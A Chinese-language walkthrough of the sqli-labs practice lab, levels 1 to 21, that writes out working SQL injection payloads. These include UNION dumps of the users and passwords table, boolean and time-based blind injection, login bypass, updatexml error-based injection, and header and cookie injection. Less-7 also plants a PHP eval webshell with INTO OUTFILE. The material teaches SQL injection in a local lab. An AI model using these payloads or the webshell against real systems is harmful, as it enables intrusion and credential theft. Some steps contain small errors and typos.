sqli-labs SQL注入靶场通关手册（1-21）

准备阶段

前面需要准备打开phpstudy

我这里是老版：phpstudy

若3306端口被占用，win+r，cmd，命令行提示符里输入

netstat -ano | findstr xxxx //xxxx为查询的端口号，找到pid，在任务管理器界面，选择对应的pid，详细信息结束进程

同时需要再网页上打开http://127.0.0.1/sqli-labs/

跳转到如下界面：

配置成功。

Less-1

判断注入类型

尝试注入个单引号闭合，网页回显 MySql 报错，说明存在注入漏洞。

?id=1'

通过''1'' LIMIT 0,1' at line 1可以看出我们添加的 ' 起到了一个闭合的作用，显示出了闭合的 1 ，然后面我们就可以添加语句进行注入，此处是字符型注入。

将我们所加的 ' 后面注释掉，可以回显正确的网页 

闭合方式：?id=1' --+

获取数据库信息

接下来判断表有几列，使用 ORDER BY 子句进行一个排序，看一下对几列有效。

?id=1' ORDER BY 8--+  

使用二重法，依次尝试，最终确定为3列   ?id=1' ORDER BY 3--+  

接下来判断哪些列是我们能用的，首先令 id 参数的查询不到结果，然后使用 UNION 进行组合查询。网页回显了数字 2 和 3，说明第 2 列和第 3 列是我们可用的。

?id=-99' UNION SELECT 1,2,3--+

接下来开始爆数据库名，我们选择第 2 个位置作为显示位。database() 函数可以回显当前使用的数据库，我们将对它进行查询。

?id=99' UNION SELECT 1,database(),3 --+

接下来开始爆表名，在 information_schema.table 进行查询，使用 group_concat() 函数合并查询结果。

?id=-99' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema='security'--+

接下来爆 users 表的字段，在 information_schema.columns 爆出来

?id=-99' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'--+

获取目标信息

接下来我们爆出 users 表中的信息，这个表有用户名和密码这种敏感信息。

?id=-99' union select 1,group_concat(concat_ws(';',username,password)),3 from security.users--+

Less-2

判断注入类型

先注入正常参数，网页回显正常的信息

闭合方式：?id=1

尝试注入单引号闭合，网页回显 MySQL 报错，说明存在注入漏洞

?id=1'

加个注释，将后端的 SQL 语句后面的内容注释后，网页仍然不能回显正确的信息。即我们注入的单引号没有起到闭合的作用。得出结论：这是一个数字型注入。

数字型注入和字符型注入的区别在于我们不需要用单引号去闭合，其他操作基本相同

获取数据库信息

判断表有几列，使用 ORDER BY 子句进行排序，看对几列有效

?id=1  order by 3--+ 有效

?id=1  order by 4--+ 无效

结果就是有三列可用

接下来判断哪些列是我们能用的，令 id 参数的查询不到结果，然后是同 UNION 进行组合查询。网页回显了数字 2 和 3，说明第二列和第三列是我们可以用的

?id=-90 union select 1,2,3 --+   

爆破数据库名

?id=99 union select 1,database(),3 --+

爆破表名

?id=-99 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

获取目标信息

爆破users表的字段

?id=-99 union select 1,group_concat(concat_ws(';',username,password)),3 from security.users--+

Less-3

判断是否存在注入点

先注入正常参数，网页回显正常的信息

?id=1

尝试单引号闭合，网页回显 MySQL 语句报错，说明存在注入漏洞,

?id=1'

根据报错信息，我们需要一个括号开闭合，其他操作与前两题相同，为字符型

闭合方式：?id=1') --+

获取数据库信息

其余查询与前面第一关整体一样，只是闭合方式不同

Less-4

判断闭合方式

先注入正常参数，网页回显正常的信息

?id=1

?id=1'  网页也回显正常的信息

尝试注入双引号闭合，MySQL 语句报错，说明存在注入漏洞，并且闭合符号是双引号+括号

加上--+，注释掉后面的 SQL 语句

闭合方式：?id = 1 ") --+

获取数据库信息与除了闭合方式不同，其余均与第一关相同。

Less-5

判断闭合方式

先输入正确的参数，页面返回“You are in ... ”，但是没有其他信息

?id=1接下来注入个查不到的参数，页面没有任何反应。说明向这个网页传入参数是用于判断 id 值是否存在，如果存在则返回信息。由于网页仅返回或不存在，因为我们可以使用 bool 注入（布尔注入）

?id = -1判断是否有 SQL 注入漏洞，注入个单引号进行闭合，网页返回报错信息。

这说明网页存在 SQL 注入漏洞，并且用单引号字符型注入，

正确的信息回显 you are in...  错误的信息报错或无回显

闭合方式：?id=1'

加上--+，注释掉后面的 SQL 语句

获取数据库信息

接下来判断表有几列，使用 ORDER BY 子句进行一个排序，看一下对几列有效。

?id=1' orderby  3--+     you are in ...

?id=1' order by  4--+    报错信息即存在三列信息

使用 length() 函数结合回显信息判断数据库长度，多次尝试测试长度为8

?id=1'  and length((select database())=8 --+

获取数据库名，此处不适用 UNION 联合查询（因为当 id 为一个查不到的参数时，页面无显示。即因为是布尔注入）。我们使用 left() 函数，left(string, num) 函数返回字符串 string 最左边的 num 个字符串。

我们首先使用 left() 函数判断数据库名的第一位是否是字符 a。注入之后无回显，说明数据库名第一位不是 a

?id = 1' and left((select database()),1)='a' --+经过多次测试，第一位为s

?id = 1' and left((select database()),1)='a' --+

从a到z慢慢试最后得到

?id=1' AND LEFT((SELECT database()), 8)='security' --+

Less-6

判断闭合方式

首先注入正确的参数，页面返回“You are in ...”，但是没有其他信息

?id=1

接下来注入个查不到的参数，网页没有任何反应。说明向这个网页传入参数是用于判断 id 值是否存在，如果存在则返回信息。由于网页仅返回存在或不存在，因此我们可以使用 bool 注入。

?id=999999判断是否有 Sql 注入漏洞，注入个单引号进行闭合，网页返回 “You are in...”。

?id=1'注入个双引号进行闭合，网页返回错误。这说明网页存在 Sql 注入漏洞，并且是用双引号字符型注入。

闭合方式：?id=1"

获取数据库信息

其余查询与前面第五关整体一样，只是闭合方式不同

Less-7

通过sql注入，写入一个木马文件

开启文件读取权限

MySQL 使用 secure-file-priv 参数对文件读写进行限制，当参数值为 null 时无法进行文件导出操作。使用这条命令可以查看

通过修改 MySQL 下的 my.ini 配置文件就可以启用权限，需要把下面这个字符串写入文件中。

secure_file_priv="/"

将phpsty重启，在数据库中再次查看

判断闭合方式

注入个正常的参数，网页返回“You are in.... Use outfile......”。

闭合方式：?id=1

注入单引号和单引号加个括号闭合，网页回显错误信息。

?id=1'

?id=1')

?id=1'))

写入文件

我们需要先知道网页所在的文件路径，从该题中的无法得到的，我们去 Less-1 题，在那获取文件路径。这种操作也可以应用在实践中，可以同时利用同一 Web 中的多个注入点。使用 UNION 联合查询来注入参数，使用 into outfile 在网页目录下入一句话木马。注意此处存在转义问题，所有的“\”都要双写

?id=1' UNION SELECT 1,2,'<?php @eval($_POST["123456"]);?>' into outfile "D:\\phpStudy\\WWW\\sqli-labs\\Less-7\\text.php"--+

查看文件夹

使用蚁剑连接，记得 url 要加上我们传入的 text.php。点击添加，双击所添加的出现以下界面，即成功：

Less-8

判断闭合方式

首先注入正确的参数，网页返回 “You are in...”，但是没有其他信息。

?id=1

然后注入一个查不到的参数，网页没有任何反应。说明向这个网页传入参数是用于判断 id 值是否存在，如果存在则返回信息

?id=9999

判断是否有 SQL 注入漏洞，注入个单引号进行闭合，网页无任何返回

?id=1'

此时还是注入单引号，但是后面注释掉，网页返回“You are in ...”。

这说明网页存在 SQL 注入漏洞，并且是用单引号字符型注入。同时因为 SQL 语句发生错误，因此此处是 bool 盲注漏洞

闭合方式：?id=1'--+

获取数据库信息与第五关类似，只是闭合方式不同，报错时不显示报错信息

Less-9

判断闭合方式

首先注入正确的参数，网页返回 “You are in...”，但是没有其他信息。

首先注入正确的参数，网页返回“You are in ...”，但是没有其他信息

?id=1

接下来注入个查不到的参数，网页还是返回“You are in ...”     ?id=9999

注入个单引号进行闭合，网页还是返回“You are in ...”            ?id=1'

再尝试下面三种方式：网页仍然是“You are in ...”

?id=1' --+

?id=1"

?id=1" --+

我们转换思路，MySQL 的 sleep() 函数能够起到休眠的作用。为了方便调试，我们使用 Burp 拦截工具中的重放器

?id=1 and sleep(1) --+ 使用 Burp 工具开启拦截，并注入，发送都重放器，发送并观察时间

然后在网页中再次尝试

明显响应时间变长，这是明显的基于 时间盲注 的字符型 SQL 注入漏洞，我们需要使用 sleep() 函数制造时间差来进行注入。有时间延迟说明注入的

闭合方式：id = 1'  and sleep(10)  --+

获取数据库信息

注入流程与 Less-5 类似，不过这里的判断标准不是回显的信息，而是响应时间。MySQL 的 IF 语句允许根据表达式的某个条件或结果来执行一组 SQL 语句，语法如下，当表达式 expr 为真时返回 value1 的值，否则返回 value2

if(expr,value1,value2)

通过二分法测试，最终确定数据库长度为 8

?id=1' and if(length(database())=8,sleep(10),1) --+

使用穷举法进行测试，得到数据库名的第一个字符为 "s"

?id=1' and if(left((select database()),1)='s' ,sleep(10),1) --+

最终得到数据库名字为“security”

均通过响应时间来确定

接下来使用类似的方法，爆出表明、字段名和其他信息

Less-10

判断闭合方式

与第9关类似，属于通过时间盲注，只是闭合方式不同

闭合方式：id=1" and sleep(10) --+

获取数据库信息与第9关闭合方式不同，其余一样

Less-11

判断闭合方式

我们首先尝试下这个网页的正常用法，输入一个正确的用户名和密码试试，网页显示登陆成功。

Username :  admin

Password :   admin接下来直接在 “Username” 中直接注入单引号，网页返回报错信息，说明存在 Sql 注入。

注入万能密码试试，用户名随便写点东西，使用 OR 运算符构造恒真条件，使用 “#” 注释掉后面的内容注入。网页提示我们注入成功，由于此处使用的是单引号闭合，因此这里是字符型注入。

闭合方式： ' OR 1 = 1#

获取数据库信息

判断表有几列，使用 ORDER BY 子句进行排序看下对几列有效

username: '  or 1=1 order by 3 #   报错

username: '  or 1=1 order by 2 #   有效

说明存在两列

爆数据库名，首先注入错误的用户名和密码，使其找不到数据。

使用 UNION 进行联合查询，查询成功把数据库名接到网页回显的地方。

' UNION SELECT database(),1#爆破表名：' union select 1,group_concat(table_name) from information_schema.tables where table_schema ='security' #爆破字段名：' union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'  #爆破账号密码：' union select 1,group_concat(concat_ws(';',username,password)) from security.users #

Less-12

判断闭合方式

用户名随便写点东西后用单引号闭合，使用 OR 运算符构造恒真条件，使用 “#” 注释掉后面的内容注入。网页提示登录失败，并且没有返回报错信息，说明不是用单引号闭合。

a' or1 = 1#

注入以下的内容，统统都显示登录失败且无回显。

a') or 1 = 1#

a')) or 1 = 1#

使用双引号闭合，出现报错，

a " or 1=1 

通过报错信息发现需要双引号和括号进行闭合，所以

闭合方式：a " )or 1=1 #

获取数据库信息与第11关整体相同，只是闭合方式不同

Less-13

判断闭合方式

先使用 ' 单引号闭合，发现报错信息

通过报错信息可知，我们需要一个单号号和一个括号进行闭合，所以

闭合方式：'  ) or 1=1 #

但是成功后没有回显信息，成功显示蓝色信息，失败显示红色信息

获取数据库信息

使用 length() 函数结合回显信息判断数据库长度，经过测试数据库的长度为8

') or 1=1 or  length((select database()))=8#使用 left(string，num) 函数返回字符串 string 最左边的 num 个字符。首先使用判断数据库名的第一位是否是字符 a，依次尝试a-z，最终得出的结果为s

') or 1=1 or  left((select database()),1)='s'#使用同样的方法继续爆破表名、字段名及其剩余信息。

Less-14

判断闭合方式

先使用 ' 单引号闭合，显示网页登陆失败但是没有报错信息

在使用" 双引号闭合，出现报错信息通过报错信息可知，需要一个双引号进行闭合，所以

闭合方式：" or 1=1 #

获取数据库信息与第13关整体相同只是闭合方式不同

Less-15

判断闭合方式

先使用单引号注入，发现显示登陆失败，但是没有报错信息

以此使用双引号，加括号的方式，均没有报错信息

当你依次注入完整的注入信息是，发现 ' or 1=1 # 是成功登陆界面，在此登陆界面只能通过成功与失败进行，可用使用 bool 盲注或者时间盲注都行。

闭合方式：' OR 1 = 1#

获取数据库信息，我们使用布尔盲注的话，和前面第5关类似，只是字段判断出来是两列，闭合方式不同，其余流程相同；使用时间盲注的话和前面第9关类型，闭合方式不同，其余流程大体相同

Less-16

判断闭合方式

使用15关的思路，与15关大同小异，只是闭合方式不同，通过测试发现

闭合方式：") OR 1 = 1#

获取数据库信息和15关闭合方式不同，其余流程相同

Less-17

本关卡有两个 SQL 语句，其中一个进行了强效的过滤，我们需要发现第二个注入点。同时本关卡可以使用 报错注入 进行攻击

判断闭合方式

我们先按照网页的功能走一遍，目测是更改密码的页面，输入用户名之后用新密码覆盖旧密码

去第11关尝试，发现登陆成功，说明密码修改完成

使用单引号闭合构造恒真条件，网页回显密码修改失败。

a' OR 1 = 1#

测试一下所有的注入，发现这些注入网页都回显改密失败。

a') OR 1 = 1# 

a')) OR 1 = 1# 

a" OR 1 = 1# a") OR 1 = 1# 

a")) OR 1 = 1#

我们切换下思路，之前我们的用户名字段都是空字符，现在我们写上一个已知的用户名 admin 再次注入。

uname=admin

passwd='        出现报错信息

闭合方式：

uname=admin

passwd='   or 1=1  #

网页回显改密码成功，并且报了一个语法错误，说明 passwd 使用单引号进行闭合。同时我们可以推测这个关卡有 2 次查询，第一次是根据 uname 参数进行查询，判断要改密码的用户是否存在。第二次查询时根据要改密码的用户，把 passwd 参数覆盖原密码，这里在第二次查询有注入点。

updatexml() 报错注入

我们将使用 updatexml() 报错注入，该函数用于改变 XML 文档中符合条件的节点的值。函数原型为：

UPDATEXML (XML_document, XPath_string, new_value);

参数	说明
XML_document	String，XML 文档对象的名称
XPath_string	Xpath 格式的字符串
new_value	String，用于替换查找到的符合条件的数据

其中参数 XPath_string 需要是“/xxx/xxx/...”的格式，进行查询时将会按照这个参数进行操作。注意：如果 XPath_string 是一个错误的路径，但是该路径符合参数规范，就不会报错。反之，参数不符合规范，则会触发报错，我们就是利用这个，通过 updatexml() 函数的报错回显我们需要的信息。

获取数据库信息

利用 updatexml() 函数获取下当前使用的 MySQL版本

' OR updatexml(1,concat("!",version()),2)#

获取数据库名：

uname=admin

password=' OR updatexml(1,concat("!",version()),2)#爆破表名：

uname=admin

passwd=' OR updatexml(1,concat("!",(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'security')),2)#爆破字段名：

uname=admin

password=' OR updatexml(1,concat("!",(SELECT group_concat(column_name) FROM information_schema.columns WHERE table_schema = 'security' AND table_name = 'users')),2) or'

爆破账号密码：

uname=admin

Less-18

判断闭合方式

首先我们注入正确的用户名和密码，观察到网页回显了 IP Address 和 User Agent。用户代理 User Agent 是一个 HTTP 头，使得服务器能够识别客户使用的操作系统及版本、CPU 类型、浏览器及版本、浏览器渲染引擎、浏览器语言、浏览器插件等。

接下来注入个错误的用户名和密码，网页显示登录失败且仅回显了 IP Address。

Username:admin

Password:a依次使用引号，双引号，括号的方式闭合，发现均为上面图片的报错信息

注意到登录成功时，User Agent 会被回显到网页上，我们考虑 User Agent 头可能会存在注入

使用 brup 抓包

Ctrl +R 发送到 Repeater修改 User-Agent 字段，添加一个引号，发现报错信息，说明此处存在注入点

闭合方式：User-Agent：' ' 

获取数据库信息

在注入的两个单引号之间可以插入其他 Sql 语句，我们在这里放置 updatexml() 报错注入语句。注意使用单引号闭合两侧的 Sql 语句时，相当于把它分割成了 2 部分，插入 updatexml() 报错时要用 OR 进行连接。

爆破数据库：

' OR updatexml(1,concat("!",database()),2)or '爆破表名：

' OR updatexml(1,concat("!",(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'security')),2) or'

爆破字段名：

' OR updatexml(1,concat("!",(SELECT group_concat(column_name) FROM information_schema.columns WHERE table_schema = 'security' AND table_name = 'users')),2) or'

Less-19

判断闭合方式

整体思路与第18关一样，只是闭合方式和注入点不同，在输入正确的账号和密码时，Referer显示回页面，所以我们判断它为注入点

闭合方式：Referer：''

获取数据库信息整体与第18关相同，注入点不用

Less-20

判断闭合方式

首先随便输入正确的用户名和密码进行登录，观察到网页回显了大量信息。再次刷新，Less 20 的页面没有变化，这应该是 cookie 起到的作用。cookie 是网站为了辨别用户身份，进行 Session 跟踪而储存在用户本地终端上的数据。想要回到登录页面，我们需要先把 cookie 清除掉。

依次使用引号，双引号，括号的方式闭合，发现均为以下图片的报错信息

为了发现注入点，我们抓包看看，首先抓登录网页发的包

发现有一个在网页所看到的

根据 Cookie 的作用和原理，网页在用户登录后，会利用浏览器记录用户的登录状态，在用户刷新、重新登录或进入其他相关页面时，不需要再次登录。

我们猜测，Cookie是一个注入点

我们在此次使用单引号闭合发现报错信息，说明处为注入点

根据报错信息我们确定闭合方式

闭合方式：Cookie:uname=' '

获取数据库信息整体与第18关相同，注入点不用

Less-21

判断闭合方式

首先随便输入正确的用户名和密码进行登录，观察到网页回显了大量信息，与第20关网页相同利用相同的方法，我们发现此次还是Cookie作为注入点，但是闭合方式不同

闭合方式：Cookie:uname=') '

当我们想要获取数据库时发现，此次的注入点信息不是我们能够看懂的信息

通过转换我们发现此次使用的是base64编码，我们需要将我们所需要的命令优先转换为base64编码在进行发生，例如我们爆破数据库

' union select 1,database(),3#   我们需要将这个命令转换，在这个工具里面自动转换，也可以在网上转换后进行替换​​​​​​​转换完成后进行发送，得到我们需要的

其余的爆破均使用该方法，其余命令与第18关相同，注入点不同